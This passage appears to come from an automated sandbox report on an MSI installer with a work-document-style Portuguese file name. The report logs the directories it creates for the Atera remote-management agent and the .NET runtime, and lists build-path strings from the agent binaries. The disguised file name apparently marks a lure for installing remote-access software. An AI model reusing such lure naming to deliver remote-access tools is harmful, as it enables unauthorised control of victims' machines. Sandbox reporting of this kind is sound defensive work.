Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dll
Source: C:\Windows\System32\msiexec.exe; Directory created: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.Linq.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\hostpolicy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Writer.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Csp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TraceSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-processthreads-l1-1-1.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.DataContractSerialization.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Mail.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordbi.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.Json.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.TypeExtensions.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.AccessControl.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.X509Certificates.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-localization-l1-2-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlSerializer.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Thread.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.DriveInfo.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore_amd64_amd64_6.0.3224.31407.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Process.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.ReaderWriter.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-libraryloader-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-sysinfo-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Loader.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-environment-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.Common.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Intrinsics.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ObjectModel.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.ResourceManager.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Numerics.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XmlDocument.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.ILGeneration.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.Serialization.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.VisualC.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.UnmanagedMemoryStream.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Formats.Asn1.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Channels.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-timezone-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Quic.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-runtime-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Dataflow.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Security.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Json.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Transactions.Local.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Console.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.VisualBasic.Core.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Serialization.Formatters.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tracing.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\dbgshim.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-locale-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\WindowsBase.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clrjit.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-datetime-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Cng.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.Calendars.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Core.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-2-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.NETCore.App.runtimeconfig.json
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-string-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clretwrc.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.CompilerServices.Unsafe.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceModel.Web.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.SecureString.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\Microsoft.CSharp.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Numerics.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-memory-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Encoding.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.FileVersionInfo.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Contracts.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-file-l2-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorrc.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.Xml.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.RuntimeInformation.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Ping.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-synch-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceProcess.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Primitives.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Pipes.AccessControl.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Annotations.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.DiagnosticSource.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-stdio-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.ThreadPool.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.CoreLib.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.CodePages.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\.version
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-console-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.Lightweight.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-process-l1-1-0.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\host
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\host\fxr
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\host\fxr\6.0.32
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\host\fxr\6.0.32\hostfxr.dll
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\dotnet.exe
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\LICENSE.txt
                                Source: C:\Windows\System32\msiexec.exe Directory created: C:\Program Files\dotnet\ThirdPartyNotices.txt
                                Source: C:\Windows\System32\msiexec.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}
                                Source: TRABALHO----PROCESSO0014S55-S440000000S1.msi Static file information: File size 2994176 > 1048576
                                Source: Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exet.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000016.00000002.1582113314.0000026AD1DE2000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageTicketing.exe, 00000033.00000002.2566768207.00000248450A2000.00000002.00000001.01000000.00000047.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2141218924.000002139AE46000.00000002.00000001.01000000.00000038.sdmp, AgentPackageMarketplace.exe, 0000003A.00000002.2134241384.00000165B08F2000.00000002.00000001.01000000.00000036.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Data.DataSetExtensions\net6.0-Release\System.Data.DataSetExtensions.pdb source: System.Data.DataSetExtensions.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageMarketplace\AgentPackageMarketplace\obj\Release\AgentPackageMarketplace.pdby source: AgentPackageMarketplace.exe, 0000003A.00000000.2008949218.00000165977F2000.00000002.00000001.01000000.0000002E.sdmp
                                Source: Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1829529042.0000022AD9322000.00000002.00000001.01000000.00000025.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ValueTuple/net47\System.ValueTuple.pdb62P2 B2_CorDllMainmscoree.dll source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1813154898.0000022AC08F2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb5` source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentCommunication.Models\obj\Release\net45\Atera.AgentCommunication.Models.pdbSHA256G source: AgentPackageInternalPoller.exe, 00000037.00000002.2102333146.000001CC12CE2000.00000002.00000001.01000000.00000030.sdmp
                                Source: Binary string: C:\Users\LiorKovarsky\Downloads\sharpsnmplib-11.3.0\sharpsnmplib-11.3.0\SharpSnmpLib\obj\Release\net45\win\SharpSnmpLib.pdbSHA256 source: AgentPackageInternalPoller.exe, 00000037.00000002.2129021473.000001CC2B782000.00000002.00000001.01000000.00000035.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbdq source: AgentPackageTicketing.exe, 00000033.00000002.2566768207.00000248450A2000.00000002.00000001.01000000.00000047.sdmp
                                Source: Binary string: D:\a\41\s\AteraNugetPackages\Atera.AgentPackages.CommonLib\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb' source: AgentPackageMarketplace.exe, 0000003A.00000002.2115830756.0000016597FE2000.00000002.00000001.01000000.00000031.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: api-ms-win-crt-time-l1-1-0.dll.2.dr
                                Source: Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 00000010.00000002.1925066470.0000023477EB2000.00000002.00000001.01000000.00000028.sdmp
                                Source: Binary string: D:\a\CliWrap\CliWrap\CliWrap.Signaler\obj\Release\net35\CliWrap.Signaler.pdbSHA256 source: CliWrap.dll.26.dr
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.OpenSsl\net6.0-Release\System.Security.Cryptography.OpenSsl.pdb source: System.Security.Cryptography.OpenSsl.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\AgentPackageProgramManagement\obj\Release\AgentPackageProgramManagement.pdb source: AgentPackageProgramManagement.exe, 00000035.00000000.1980617476.000002139A632000.00000002.00000001.01000000.0000002B.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageProgramManagement\ThirdPartyPackageManager\obj\Release\ThirdPartyPackageManager.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2140375764.000002139AA62000.00000002.00000001.01000000.00000037.sdmp
                                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.2.dr
                                Source: Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 00000010.00000002.1922183275.0000023477BDB000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1557171190.000001FD40E72000.00000002.00000001.01000000.00000018.sdmp, AgentPackageAgentInformation.exe.16.dr
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1813643503.0000022AC0992000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\net6.0-Release\System.Reflection.Primitives.pdb8+N+ @+_CorDllMainmscoree.dll source: System.Reflection.Primitives.dll.2.dr
                                Source: Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdben source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2408601657.0000010B6F742000.00000002.00000001.01000000.00000045.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: TRABALHO----PROCESSO0014S55-S440000000S1.msi, MSIDF2C.tmp.2.dr
                                Source: Binary string: D:\a\1\s\Atera.AgentPackages.CommonLib\obj\Release\Atera.AgentPackages.CommonLib.pdb source: Atera.AgentPackages.CommonLib.dll2.26.dr
                                Source: Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdbq$ source: AgentPackageTicketing.exe, 00000033.00000002.2566346650.0000024845082000.00000002.00000001.01000000.00000046.sdmp
                                Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp
                                Source: Binary string: C:\buildAgent\work\1b72bc6dac87fa71\code_drop\merge\chocolatey.pdb source: AgentPackageProgramManagement.exe, 00000035.00000002.2280744227.00000213B41F4000.00000002.00000001.01000000.00000041.sdmp
                                Source: Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000004.00000003.1309119878.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1315354655.0000000004A36000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1363432071.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1454376073.0000000004FE9000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdbSHA256`{f source: AgentPackageMonitoring.exe, 00000025.00000002.1813154898.0000022AC08F2000.00000002.00000001.01000000.00000020.sdmp
                                Source: Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000016.00000002.1582113314.0000026AD1DE2000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageProgramManagement.exe, 00000035.00000002.2141218924.000002139AE46000.00000002.00000001.01000000.00000038.sdmp
                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                                Source: Binary string: PC:\Windows\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdbcccGCTL source: AteraAgent.exe, 0000001A.00000002.2398266422.000001A89A6B3000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F674000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2012\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1841451825.00007FFB0300A000.00000002.00000001.01000000.0000001E.sdmp
                                Source: Binary string: ent.pdb0Pf source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ValueTuple/net47\System.ValueTuple.pdb source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882208000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdb source: AgentPackageMonitoring.exe, 00000025.00000002.1829135389.0000022AD92B2000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2398777633.0000010B6F6D4000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageMarketplace\AgentPackageMarketplace\obj\Release\AgentPackageMarketplace.pdb source: AgentPackageMarketplace.exe, 0000003A.00000000.2008949218.00000165977F2000.00000002.00000001.01000000.0000002E.sdmp
                                Source: Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdbSHA256 source: AgentPackageMonitoring.exe, 00000025.00000002.1813643503.0000022AC0992000.00000002.00000001.01000000.00000022.sdmp
                                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.UnmanagedMemoryStream\net6.0-Release\System.IO.UnmanagedMemoryStream.pdb source: System.IO.UnmanagedMemoryStream.dll.2.dr
                                Source: Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000E.00000000.1397150472.000001E726672000.00000002.00000001.01000000.00000010.sdmp
                                Source: Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdbp+ source: AgentPackageMonitoring.exe, 00000025.00000002.1829135389.0000022AD92B2000.00000002.00000001.01000000.00000024.sdmp
                                Source: Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002F.00000002.2270629111.0000000689FB3000.00000004.00000010.00020000.00000000.sdmp
